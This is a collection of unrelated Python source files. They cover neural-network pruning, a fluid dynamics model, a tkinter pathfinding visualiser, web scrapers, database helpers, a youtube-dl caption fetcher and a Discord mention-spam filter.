nncf_logger.info('Pruned Elementwise {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('stop_propagation_ops')
class PTStopMaskForwardOps(PTDefaultMetaOp):
subtypes = [MeanMetatype, MaxMetatype, MinMetatype, LinearMetatype, MatMulMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return False
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_masks = get_input_masks(nx_node, nx_graph)
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = None
class ModelPruner:
def __init__(self, model: NNCFNetwork, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
self.model = model
self.graph = graph
self.nx_graph = nx_graph
@staticmethod
def get_class_by_type_name(type_name) -> PTDefaultMetaOp:
"""
Return class of metaop that corresponds to type_name type.
"""
cls = PT_PRUNING_OPERATOR_METATYPES.get_operator_metatype_by_op_name(type_name)
if cls is None:
nncf_logger.warning(
"Layer {} is not pruneable - will not propagate pruned filters through it".format(type_name))
cls = PTStopMaskForwardOps
return cls
def mask_propagation(self):
"""
Mask propagation in graph:
to propagate masks run method mask_propagation (of metaop of current node) on all nodes in topological order.
"""
sorted_nodes = [self.nx_graph.nodes[node_name] for node_name in nx.topological_sort(self.nx_graph)]
for node in sorted_nodes:
node_type = self.graph.node_type_fn(node)
cls = self.get_class_by_type_name(node_type)
cls.mask_propagation(self.model, node, self.graph, self.nx_graph)
nncf_logger.info('Finished mask propagation in graph')
def apply_mask(self):
"""
Applying propagated masks for all nodes in topological order:
1. running input_prune method for this node
2. running output_prune method for this node
"""
sorted_nodes = [self.nx_graph.nodes[name] for name in nx.topological_sort(self.nx_graph)]
pruned_node_modules = list()
with torch.no_grad():
for node in sorted_nodes:
node_type = self.graph.node_type_fn(node)
node_cls = self.get_class_by_type_name(node_type)
nncf_node = self.graph._nx_node_to_nncf_node(node)
node_module = self.model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
# Some modules can be associated with several nodes
if node_module not in pruned_node_modules:
node_cls.input_prune(self.model, node, self.graph, self.nx_graph)
node_cls.output_prune(self.model, node, self.graph, self.nx_graph)
pruned_node_modules.append(node_module)
nncf_logger.info('Finished mask applying step')
def prune_model(self):
"""
Model pruner work in two stages:
1. Mask propagation: propagate pruning masks through the graph.
2. Applying calculated masks
:return:
"""
nncf_logger.info('Start pruning model')
self.mask_propagation()
self.apply_mask()
nncf_logger.info('Finished pruning model')
|
import numpy as np
import matplotlib.pyplot as plt
import time
import h5py
from ..doublyPeriodic import doublyPeriodicModel
from numpy import pi
class model(doublyPeriodicModel):
def __init__(self, name = None,
# Grid parameters
nx = 128, ny = None, Lx = 2.0*pi, Ly = None,
# Solver parameters
t = 0.0,
dt = 1.0e-2, # Numerical timestep
step = 0,
timeStepper = 'RK4', # Time-stepping method
nThreads = 1, # Number of threads for FFTW
useFilter = False,
#
# Linearized Boussinesq params
f0 = 1.0,
kappa = 4.0,
# Friction
waveVisc = 0.0,
waveViscOrder = 2.0,
waveDiff = 0.0,
waveDiffOrder = 2.0,
meanVisc = 1.0e-4,
meanViscOrder = 2.0,
):
# Physical parameters specific to the Physical Problem
self.f0 = f0
self.kappa = kappa
self.meanVisc = meanVisc
self.meanViscOrder = meanViscOrder
self.waveVisc = waveVisc
self.waveViscOrder = waveViscOrder
self.waveDiff = waveDiff
self.waveDiffOrder = waveDiffOrder
# Initialize super-class.
doublyPeriodicModel.__init__(self, name = name,
physics = "single-mode hydrostatic Boussinesq equations" + \
" linearized around two-dimensional turbulence",
nVars = 4,
realVars = True,
# Persistant doublyPeriodic initialization arguments
nx = nx, ny = ny, Lx = Lx, Ly = Ly, t = t, dt = dt, step = step,
timeStepper = timeStepper, nThreads = nThreads, useFilter = useFilter,
)
# Default vorticity initial condition: Gaussian vortex
(xc, yc, R) = (self.x-self.Lx/2.0, self.y-self.Ly/2.0, self.Lx/20.0)
q0 = 0.1*self.f0 * np.exp( -(xc**2.0+yc**2.0)/(2*R**2.0) )
# Default wave initial condition: uniform velocity.
u, v, p = self.make_plane_wave(16)
self.set_uvp(u, v, p)
self.set_q(q0)
self.update_state_variables()
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def describe_physics(self):
print("""
This model solves the Boussinesq equations linearized around \n
a two-dimensional barotropic flow for a single vertical mode. \n
No viscosity or dissipation can be specified, since this is not \n
required to stabilize the wave-field solutions. Arbitrary-order \n
hyperdissipation can be specified for the two-dimensional flow. \n
There are four prognostic variables: the two-dimensional flow,
the two horizontal velocity components u and v, and the pressure
field. The chosen vertical mode is represented by the single \n
parameter kappa, which is the square root of the eigenvalue \n
from the vertical mode eigenproblem.
""")
def _init_linear_coeff(self):
""" Calculate the coefficient that multiplies the linear left hand
side of the equation """
# Two-dimensional turbulent viscosity.
self.linearCoeff[:, :, 0] = -self.meanVisc \
* (self.k**2.0 + self.l**2.0)**(self.meanViscOrder/2.0)
self.linearCoeff[:, :, 1] = -self.waveVisc \
* (self.k**2.0 + self.l**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 2] = -self.waveVisc \
* (self.k**2.0 + self.l**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 3] = -self.waveDiff \
* (self.k**2.0 + self.l**2.0)**(self.waveDiffOrder/2.0)
def _calc_right_hand_side(self, soln, t):
""" Calculate the nonlinear right hand side of PDE """
# Views for clarity:
qh = soln[:, :, 0]
uh = soln[:, :, 1]
vh = soln[:, :, 2]
ph = soln[:, :, 3]
# Physical-space things
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
# Calculate streamfunction
self.psih = -qh / self._divSafeKsq
# Mean velocities
self.U = -self.ifft2(self._jl*self.psih)
self.V = self.ifft2(self._jk*self.psih)
# Mean derivatives
self.Ux = self.ifft2(self.l*self.k*self.psih)
self.Uy = self.ifft2(self.l**2.0*self.psih)
self.Vx = -self.ifft2(self.k**2.0*self.psih)
# Views to clarify calculation of A's RHS
U = self.U
V = self.V
q = self.q
u = self.u
v = self.v
p = self.p
Ux = self.Ux
Uy = self.Uy
Vx = self.Vx
# Solely nonlinear advection for q
self.RHS[:, :, 0] = - self._jk*self.fft2(U*q) - self._jl*self.fft2(V*q)
# Linear terms + advection for u, v, p, + refraction for u, v
self.RHS[:, :, 1] = self.f0*vh - self._jk*ph \
- self._jk*self.fft2(U*u) - self._jl*self.fft2(V*u) \
- self.fft2(u*Ux) - self.fft2(v*Uy)
self.RHS[:, :, 2] = -self.f0*uh - self._jl*ph \
- self._jk*self.fft2(U*v) - self._jl*self.fft2(V*v) \
- self.fft2(u*Vx) + self.fft2(v*Ux)
self.RHS[:, :, 3] = -self.cn**2.0 * ( self._jk*uh + self._jl*vh ) \
- self._jk*self.fft2(U*p) - self._jl*self.fft2(V*p)
self._dealias_RHS()
def _init_problem_parameters(self):
""" Pre-allocate parameters in memory in addition to the solution """
# Wavenumbers and products
self._jk = 1j*self.k
self._jl = 1j*self.l
self._divSafeKsq = self.k**2.0 + self.l**2.0
self._divSafeKsq[0, 0] = float('Inf')
# Mode-n wave speed:
self.cn = self.f0 / self.kappa
# Vorticity and wave-field amplitude
self.q = np.zeros(self.physVarShape, np.dtype('float64'))
self.u = np.zeros(self.physVarShape, np.dtype('float64'))
self.v = np.zeros(self.physVarShape, np.dtype('float64'))
self.p = np.zeros(self.physVarShape, np.dtype('float64'))
# Streamfunction transform
self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))
# Mean and wave velocity components
self.U = np.zeros(self.physVarShape, np.dtype('float64'))
self.V = np.zeros(self.physVarShape, np.dtype('float64'))
self.Ux = np.zeros(self.physVarShape, np.dtype('float64'))
self.Uy = np.zeros(self.physVarShape, np.dtype('float64'))
self.Vx = np.zeros(self.physVarShape, np.dtype('float64'))
def update_state_variables(self):
""" Update diagnostic variables to current model state """
# Views for clarity:
qh = self.soln[:, :, 0]
uh = self.soln[:, :, 1]
vh = self.soln[:, :, 2]
ph = self.soln[:, :, 3]
# Streamfunction
self.psih = - qh / self._divSafeKsq
# Physical-space PV and velocity components
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
self.U = -self.ifft2(self._jl*self.psih)
self.V = self.ifft2(self._jk*self.psih)
def set_q(self, q):
""" Set model vorticity """
self.soln[:, :, 0] = self.fft2(q)
self._dealias_soln()
self.update_state_variables()
def make_plane_wave(self, kNonDim):
""" Set linearized Boussinesq to a plane wave in x with speed 1 m/s
and normalized wavenumber kNonDim """
# Dimensional wavenumber and dispersion-relation frequency
kDim = 2.0*pi/self.Lx * kNonDim
sigma = self.f0*np.sqrt(1 + kDim/self.kappa)
# Wave field amplitude.
#alpha = sigma**2.0 / self.f0**2.0 - 1.0
a = 1.0
# A hydrostatic plane wave. s > sqrt(s^2+f^2)/sqrt(2) when s>f
p = a * (sigma**2.0-self.f0**2.0) * np.cos(kDim*self.x)
u = a * kDim*sigma * np.cos(kDim*self.x)
v = a * kDim*self.f0 * np.sin(kDim*self.x)
return u, v, p
def set_uvp(self, u, v, p):
""" Set linearized Boussinesq variables """
self.soln[:, :, 1] = self.fft2(u)
self.soln[:, :, 2] = self.fft2(v)
self.soln[:, :, 3] = self.fft2(p)
self._dealias_soln()
self.update_state_variables()
def visualize_model_state(self, show=False):
""" Visualize the model state """
self.update_state_variables()
# Plot in kilometers
h = 1e-3
(qMax, c) = (np.max(np.abs(self.q)), 0.8)
(cmin, cmax) = (-c*qMax, c*qMax)
fig, axArr = plt.subplots(ncols=2, figsize=(8, 4), sharex=True, sharey=True)
fig.canvas.set_window_title("Waves and flow")
axArr[0].pcolormesh(h*self.x, h*self.y, self.q, cmap='RdBu_r',
vmin=cmin, vmax=cmax)
axArr[1].pcolormesh(h*self.x, h*self.y,
np.sqrt(self.u**2.0+self.v**2.0))
axArr[0].set_ylabel('$y$', labelpad=12.0)
axArr[0].set_xlabel('$x$', labelpad=5.0)
axArr[1].set_xlabel('$x$', labelpad=5.0)
message = '$t = {:.2e}$'.format(self.t)
titles = ['$q$ ($\mathrm{s^{-1}}$)', '$\sqrt{u^2+v^2}$ (m/s)']
#positions = [axArr[0].get_position(), axArr[1].get_position()]
plt.text(0.00, 1.03, message, transform=axArr[0].transAxes)
plt.text(1.00, 1.03, titles[0], transform=axArr[0].transAxes,
HorizontalAlignment='right')
plt.text(1.00, 1.03, titles[1], transform=axArr[1].transAxes,
HorizontalAlignment='right')
if show:
plt.pause(0.01)
else:
plt.savefig('{}/{}_{:09d}'.format(
self.plotDirectory, self.runName, self.step))
plt.close(fig)
def describe_model(self):
""" Describe the current model state """
print("\nThis is a doubly-periodic spectral model for \n" + \
"{:s} \n".format(self.physics) + \
"with the following attributes:\n\n" + \
" Domain : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
" Resolution : {:d} X {:d}\n".format(self.nx, self.ny) + \
" Timestep : {:.2e} s\n".format(self.dt) + \
" Current time : {:.2e} s\n\n".format(self.t) + \
"The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
# External helper functions - - - - - - - - - - - - - - - - - - - - - - - - - -
def init_from_turb_endpoint(fileName, runName, **additionalParams):
""" Initialize a hydrostatic wave eqn model from the saved endpoint of a
twoDimTurbulence run. """
dataFile = h5py.File(fileName, 'r', libver='latest')
if 'endpoint' not in dataFile[runName]:
raise ValueError("The run named {} in {}".format(runName, fileName)
+ " does not have a saved endpoint.")
# Get model input and re-initialize
inputParams = { param:value
for param, value in dataFile[runName].attrs.iteritems() }
# Change 'visc' to 'meanVisc'
inputParams['meanVisc'] = inputParams.pop('visc')
inputParams['meanViscOrder'] = inputParams.pop('viscOrder')
# Change default time-stepper
inputParams['timeStepper'] = 'RK4'
# Re-initialize model with input params, if any are given
inputParams.update(additionalParams)
m = model(**inputParams)
# Initialize turbulence field
m.set_q(dataFile[runName]['endpoint']['q'][:])
return m
|
from tkinter import *
from math import ceil
import time
import math
import timeit
class App:
def __init__(self, master):
self.master = master
Grid = mainGrid(self.master, 0, 0)
class mainGrid:
def __init__(self, parent, x, y):
self.parent = parent
self.container = Frame(self.parent)
self.container.grid(row=x, column=y)
self.canvasWidth = 500
self.canvasHeight = 500
self.mainCanvas = Canvas(self.container, bg="black", width = self.canvasWidth, height = self.canvasHeight)
self.mainCanvas.grid(row=0, column=0)
self.buttonCanvas = Canvas(self.container, bg="white", width = 200, height = self.canvasHeight)
self.buttonCanvas.grid(row=0, column= 1)
self.mainCanvas.bind('<Button-1>', self.click)
self.mainCanvas.bind('<Button-3>', self.rightClick)
self.mainCanvas.bind('<space>', self.start)
self.createMenu()
self.mainCanvas.focus_set()
def setGridSize(self):
self.gridHeightX = self.gridSizeX.get()
self.gridHeightY = self.gridSizeX.get()
self.createGrid()
def refreshGrid(self):
self.createGrid()
def createGrid(self):
x = self.gridHeightX
y = self.gridHeightY
x = int(x)
y = int(y)
self.grid = []
self.gridType = []
self.boxSizeX = (self.canvasWidth/x)
self.boxSizeY = (self.canvasHeight/y)
for i in range(y):
self.grid.append([])
self.gridType.append([])
for j in range(x):
self.grid[i].append(self.mainCanvas.create_rectangle(0, 0, 50, 50, fill="white"))
self.gridType[i].append([0, ((y)*i)+ j, 0, 1000000, j, i, 0])
self.mainCanvas.coords(self.grid[i][j], j*self.boxSizeX, i*self.boxSizeY, j*self.boxSizeX + self.boxSizeX, i*self.boxSizeY + self.boxSizeY)
def createMenu(self):
self.startAlgoBtn = Button(self.buttonCanvas, text="Start", command=self.start)
self.startAlgoBtn.place(x = 20, y = 200)
self.startEntryX = Entry(self.buttonCanvas)
self.startEntryX.config(width=4, font="Serif 10 bold")
self.startEntryX.insert(0, "10")
self.startEntryX.place(x=30, y=150)
self.startEntryY = Entry(self.buttonCanvas)
self.startEntryY.config(width=4, font="Serif 10 bold")
self.startEntryY.insert(0, "10")
self.startEntryY.place(x=30, y=170)
self.buttonCanvas.create_text(20, 160, fill="black", font="Arial 10 bold", text="X:")
self.buttonCanvas.create_text(20, 180, fill="black", font="Arial 10 bold", text="Y:")
self.createGridBtn = Button(self.buttonCanvas, text="Start", command=self.setGridSize)
self.refreshGridBtn = Button(self.buttonCanvas, text="Reset", command=self.refreshGrid)
self.createGridBtn.place(x = 20, y = 100)
self.refreshGridBtn.place(x = 20, y = 125)
self.gridSizeX = Entry(self.buttonCanvas)
self.gridSizeX.config(width=4, font="Serif 10 bold")
self.gridSizeX.insert(0, "10")
self.gridSizeX.place(x=70, y=50)
self.gridSizeY = Entry(self.buttonCanvas)
self.gridSizeY.config(width=4, font="Serif 10 bold")
self.gridSizeY.insert(0, "10")
self.gridSizeY.place(x=70, y=70)
self.buttonCanvas.create_text(40, 60, fill="black", font="Arial 10 bold", text="WIDTH:")
self.buttonCanvas.create_text(40, 80, fill="black", font="Arial 10 bold", text="HEIGHT:")
self.cornersEnabledButton = IntVar()
self.cornersCheckBox = Checkbutton(self.buttonCanvas, text='Diagonals Enabled', variable = self.cornersEnabledButton)
self.cornersCheckBox.place(x=20, y=225)
def click(self, event):
x, y = event.x, event.y
self.updateGridClick(x, y)
def rightClick(self, event):
x, y = event.x, event.y
self.updateGridRightclick(x, y)
def updateGridClick(self, x, y):
gridX = (ceil(x/self.boxSizeX)) - 1
gridY = (ceil(y/self.boxSizeY)) - 1
if self.gridType[gridY][gridX][0] == 0:
self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="red")
self.gridType[gridY][gridX][0] = 1
elif self.gridType[gridY][gridX][0] == 1:
self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="white")
self.gridType[gridY][gridX][0] = 0
print(gridX, gridY)
def start(self):
print("Hi")
x = self.startEntryX.get()
y = self.startEntryY.get()
x = int(x)
y = int(y)
self.cornersEnabled = self.cornersEnabledButton.get()
self.SetupDjykstras(x, y)
def updateGridRightclick(self, x, y):
gridX = (ceil(x/self.boxSizeX)) - 1
gridY = (ceil(y/self.boxSizeY)) - 1
if self.gridType[gridY][gridX][0] == 0:
self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="green")
self.gridType[gridY][gridX][0] = 2
elif self.gridType[gridY][gridX][0] == 2:
self.mainCanvas.itemconfigure(self.grid[gridY][gridX], fill="white")
self.gridType[gridY][gridX][0] = 0
print(gridX, gridY)
def SetupDjykstras(self, startX, startY):
#0 is type (0 for normal, 1 for wall, 2 for target)
#1 is for node index
#2 is for previous node
#3 is for distance
#4 is x
#5 is y
#6 is unvisited
self.mainCanvas.itemconfigure(self.grid[startX][startY], fill="blue")
self.gridType[startX][startY][2] = -1
self.gridType[startX][startY][3] = 0
startNode = self.gridType[startY][startX]
currentNode = self.gridType[startY][startX]
currentNodes = [currentNode]
self.complete = False
self.LoopDijkstra(self.gridType, currentNodes, startNode)
def LoopDijkstra(self, allNodes, activeNodes, startNode):
print(activeNodes)
while self.complete == False:
if len(activeNodes) == 0:
self.complete = "None Found"
print("Path not found")
break
activeNodes = sorted(activeNodes, key=lambda x: (x[3], x[4], x[5]), reverse=False)
targetNode = activeNodes[0]
allNodes[targetNode[5]][targetNode[4]][6] = 1
self.mainCanvas.itemconfigure(self.grid[targetNode[5]][targetNode[4]], fill="orange")
activeNodes.pop(0)
print("activeNodes")
print(activeNodes)
self.mainCanvas.update_idletasks()
activeNodes, allNodes = self.findAdjacent(targetNode, activeNodes, allNodes)
if self.complete == True:
print("Drawing")
self.drawPath(allNodes, self.finalNode, startNode)
self.mainCanvas.update_idletasks()
def findAdjacent(self, targetNode, activeNodes, allNodes):
print("Target Node:")
print(targetNode)
adjacent = [[-1, -1], [0, -1], [1, -1],
[-1, 0], [1, 0],
[-1, 1], [0, 1], [1, 1]]
corners = [0, 2, 5, 7]
targetNodeX = targetNode[4]
targetNodeY = targetNode[5]
targetDistance = targetNode[3]
unvisitedNodes = []
for i in range(0, 8):
try:
if ((targetNodeX + adjacent[i][0]) >= 0) and ((targetNodeY + adjacent[i][1]) >= 0):
print("passed out of bounds")
print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][0]) != 1:
print("passed out of type check")
print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][6]) == 0:
print("passed already contains check")
print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
if i in corners:
if self.cornersEnabled:
if allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] > (targetDistance + math.sqrt(2)):
allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] = (targetDistance + math.sqrt(2))
allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][2] = (targetNode[4], targetNode[5])
else:
continue
else:
if allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] > (targetDistance + 1):
allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][3] = (targetDistance + 1)
allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][2] = (targetNode[4], targetNode[5])
contains = False
if (allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][0]) == 2:
self.complete = True
print("Complete")
self.finalNode = allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]]
break
for j, jValue in enumerate(activeNodes):
if jValue[1] == allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]][1]:
contains = True
if contains == False:
print("appending")
print(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
activeNodes.append(allNodes[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]])
self.mainCanvas.itemconfigure(self.grid[targetNodeY + adjacent[i][1]][targetNodeX + adjacent[i][0]], fill="yellow")
except IndexError:
pass
self.mainCanvas.update_idletasks()
print("Returned active Nodes:")
print(activeNodes)
return activeNodes, allNodes
def drawPath(self, currentNodes, finalNode, startNode):
lastNode = finalNode
completed = False
while completed != True:
if lastNode[2] == -1:
break
currentNode = currentNodes[lastNode[2][1]][lastNode[2][0]]
print(lastNode)
self.mainCanvas.create_line(currentNode[4] *self.boxSizeX +(self.boxSizeX/2), currentNode[5]*self.boxSizeY +(self.boxSizeY/2), lastNode[4]*self.boxSizeX + (self.boxSizeX/2), lastNode[5]*self.boxSizeY + (self.boxSizeY/2))
lastNode = currentNode
root = Tk()
app = App(root)
root.title('Pathfinding')
root.mainloop()
|
import os
import csv
import glob
from pathlib import Path
import sqlite3
from collections import defaultdict
def main():
PROJECT_ROOT = Path(__file__).parent.parent
DATABASE = str(Path(Path.home(), 'king-county-assessor.sqlite3'))
with sqlite3.connect(DATABASE) as connection:
connection.execute('DROP TABLE IF EXISTS population;')
create_parcels_footage = '''
CREATE TABLE population (
year INTEGER,
king_county INTEGER,
seattle INTEGER
);
'''
connection.execute(create_parcels_footage)
file_path = os.path.join(str(PROJECT_ROOT), 'data', 'population.csv')
with open(file_path) as f:
rows = csv.DictReader(f)
print('loading csv: ' + file_path + '\n')
raw_data = {
int(row['year']): row
for row in rows
}
interpolated_data = defaultdict(dict)
interpolated_data.update(raw_data)
for area in 'seattle', 'king_county':
for base_year in range(1900, 2000, 10):
print('interpolating {}'.format(base_year))
next_year = base_year + 10
base_pop = int(raw_data[base_year][area])
step = (int(raw_data[next_year][area]) - base_pop) / 10
for year in range(base_year + 1, next_year):
base_pop += step
interpolated_data[year]['year'] = year
interpolated_data[year][area] = base_pop
connection.executemany(
'''
INSERT INTO population
(year, seattle, king_county)
VALUES
(:year,:seattle,:king_county)
''',
interpolated_data.values()
)
|
# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from hotline.items import HotlineItem
class DongguanSpider(CrawlSpider):
name = 'Dongguan'
allowed_domains = ['wz.sun0769.com']
start_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=30']
rules = (
Rule(LinkExtractor(allow=r'question/\d+/\d+\.shtml'), callback='parse_item', follow=True),
Rule(LinkExtractor(allow=r'type=\d+&page=\d+')),
)
def parse_item(self, response):
url = response.url
title_number = response.xpath('//div[@class="pagecenter p3"]//strong[@class="tgray14"]/text()').extract_first()
# [\u4e00-\u9fa5] 提问:虎门镇龙眼社区发廊,通过微信群联系,上门联系,抬高发廊理发价格 编号:195555
print(title_number)
title_number = title_number.split(":")[1]
title = title_number.split('\xa0\xa0')[0]
number = title_number.split(":")[1]
content = response.xpath("//div[@class='c1 text14_2']//text()").get()
yield HotlineItem(url=url, title=title, number=number, content=content)
|
import pandas as pd
url = "https://raw.githubusercontent.com/justmarkham/DAT8/master/data/u.user"
occupation = pd.read_csv(url, sep = "\t")
occupation.to_csv("Datasets\occupation.csv") |
# Third party import
import pymongo
# Local application imports
from flask import (
_app_ctx_stack,
current_app
)
class MongoConnector(object):
"""Pymongo.MongoClient wrapper
Wraps default MongoClient for proper database
working with flask app context. Also handles
connection with MongoDB and close it while app
exited
"""
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
app.teardown_appcontext(self.teardown)
def connect(self):
db_host = current_app.config.get('DB_HOST', None)
db_port = int(current_app.config.get('DB_PORT', None))
db_username = current_app.config.get('DB_USERNAME', None)
if db_username is not None:
db_password = current_app.config.get('DB_PASSWORD', None)
db_auth_src = current_app.config.get('DB_NAME', None)
mongo_client = pymongo.MongoClient(host=db_host,
port=db_port,
username=db_username,
password=db_password,
authSource=db_auth_src)
else:
mongo_client = pymongo.MongoClient(host=db_host,
port=db_port)
return mongo_client
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mongo_db'):
ctx.mongo_db.close()
@property
def connection(self):
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'mongo_db'):
ctx.mongo_db = self.connect()
return ctx.mongo_db
@property
def get_db(self):
return self.connection[current_app.config.get('DB_NAME', None)]
|
#!/usr/bin/env python
# encoding: utf-8
import sys
def to_network(filename, outputname):
f = open(filename, "r")
f2 = open(outputname, "w")
convert = {}
a = f.readline()
while (a != '\n'):
k, d = a.split(":")
convert[k] = int(d)
a = f.readline()
text = f.read()
new_text = ""
for char in text:
if char in convert:
new_text+=str(convert[char])
else:
new_text+=char
f2.write(new_text)
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: python %s path_to_network_to_format result" % sys.argv[0]
else:
to_network(sys.argv[1], sys.argv[2])
|
"""Tests the `vlmd_submission_tools.subcommands.base.Subcommand` class"""
import unittest
from utils import captured_output
from vlmd_submission_tools.__main__ import main
from vlmd_submission_tools.subcommands import Subcommand
class TestSubcommand(unittest.TestCase):
class Example(Subcommand):
@classmethod
def __add_arguments__(cls, subparser):
pass
@classmethod
def __main__(cls, options):
pass
@classmethod
def __get_description__(cls):
return "Example description"
def test_get_name(self):
self.assertEqual(TestSubcommand.Example.__tool_name__(), "Example")
self.assertEqual(Subcommand.__tool_name__(), "Subcommand")
def test_get_description(self):
self.assertEqual(
TestSubcommand.Example.__get_description__(), "Example description"
)
self.assertIsNone(Subcommand.__get_description__())
def test_no_inputs(self):
with captured_output() as (_, stderr):
with self.assertRaises(SystemExit) as context:
main(args=["Example"])
self.assertTrue("invalid choice: 'Example'" in stderr.getvalue())
def test_extra_subparser(self):
with captured_output() as (_, stderr):
with self.assertRaises(SystemExit) as context:
main(args=["Example", "--fake"], extra_subparser=TestSubcommand.Example)
self.assertTrue("unrecognized arguments: --fake" in stderr.getvalue())
|
from django.db.models import Sum, F, Value, DecimalField, ExpressionWrapper, CharField
from .models import *
def summaryTotals(proposalID):
summaryTotals = Security.objects.prefetch_related('relatedDraftHoldings__draftAccount__draftPortfolio__proposal')
summaryTotals = summaryTotals.filter(
relatedDraftHoldings__draftAccount__draftPortfolio__proposal = proposalID
)
return summaryTotals
def proposalLots(proposalID):
# proposalLots = DraftTaxLot.objects.filter(draftHolding__draftAccount__draftPortfolio__proposal_id=proposalID).select_related('referencedLot').prefetch_related('draftHolding__draftAccount__draftPortfolio')
proposalLots = DraftTaxLot.objects.filter(draftHolding__draftAccount__draftPortfolio__proposal_id=proposalID).select_related('referencedLot').prefetch_related('draftHolding__draftAccount__draftPortfolio')
return proposalLots
|
'''
Created on Jun 1, 2016
@author: pedrom
'''
import subprocess
from os import listdir, remove
from os.path import isfile, join
def get_captions(youtube_url):
print("Getting captions for " + youtube_url)
ret_dic = {}
argsCapASR = "--write-auto-sub --sub-lang en --skip-download -o cap_asr.txt"
cap_asr_str = run_youtube_dl(argsCapASR, "cap_asr", youtube_url)
if not cap_asr_str == None:
ret_dic["cap_asr"] = cap_asr_str
argsManASR = "--write-sub --sub-lang en --skip-download -o cap_manual.txt"
cap_manual_str = run_youtube_dl(argsManASR, "cap_manual", youtube_url)
if not cap_manual_str == None:
ret_dic["cap_man"] = cap_manual_str
return ret_dic
def run_youtube_dl(args, outF, youtube_url):
command = "C:\Python34\Scripts\youtube-dl " + args + " " + youtube_url
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
result = ""
for line in p.stdout.readlines():
result += str(line)
retval = p.wait()
all_files = [f for f in listdir(".") if isfile(join(".", f))]
cap_str = None
for file in all_files:
if file.startswith(outF):
with open(file, encoding="utf8") as cap_asr_file:
cap_str = cap_asr_file.read()
remove(file)
return cap_str
return None
|
import discord
from .base import BaseRule
from ..utils import *
import logging
import re
log = logging.getLogger("red.breadcogs.automod")
class MentionSpamRule(BaseRule):
def __init__(
self, config,
):
super().__init__(config)
self.name = "mentionspam"
@staticmethod
async def mentions_greater_than_threshold(
message_content: str, allowed_mentions: [str], threshold: int
):
content_filtered = [
word for word in message_content.split() if word not in allowed_mentions
]
mention = re.compile(r"<@!?(\d+)>")
mention_count = len(list(filter(mention.match, content_filtered)))
return mention_count >= threshold
async def is_offensive(
self, message: discord.Message,
):
try:
mention_threshold = await self.config.guild(message.guild).get_raw(
"settings", "mention_threshold",
)
except KeyError:
mention_threshold = 4
allowed_mentions = [message.author.mention]
return await self.mentions_greater_than_threshold(
message.content, allowed_mentions, mention_threshold
)
async def set_threshold(
self, ctx, threshold,
):
guild = ctx.guild
before = 4
try:
before = await self.config.guild(guild).get_raw("settings", "mention_threshold",)
except KeyError:
pass
await self.config.guild(guild).set_raw(
"settings", "mention_threshold", value=threshold,
)
log.info(
f"{ctx.author} ({ctx.author.id}) changed mention threshold from {before} to {threshold}"
)
return (
before,
threshold,
)
|
def getNewCookie(_id: int, _nume: str, _descriere: str, _pret: int, _calorii: int, _in_menu_since: int):
cookie = {
'id': _id,
'nume': _nume,
'descriere': _descriere,
'pret': _pret,
'calorii': _calorii,
'in_menu_since': _in_menu_since
}
return cookie
def get_id(prajitura):
return prajitura['id']
def get_name(prajitura):
return prajitura['nume']
def get_description(prajitura):
return prajitura['descriere']
def get_price(prajitura):
return prajitura['pret']
def get_calories(prajitura):
return prajitura['calorii']
def get_in_menu_since(prajitura):
return prajitura['in_menu_since']
def get_cookie_string(prajitura):
return f'Prajitura cu id-ul {get_id(prajitura)}, introdusa in anul {get_in_menu_since(prajitura)}, cu numele {get_name(prajitura)}' |
# conding = utf-8
from selenium import webdriver
import time
import json
class DouyuSpider:
def __init__(self):
self.start_url = "https://www.douyu.com/directory/all"
self.driver = webdriver.Chrome(r"F:\chromedriver.exe")
def get_content_list(self):
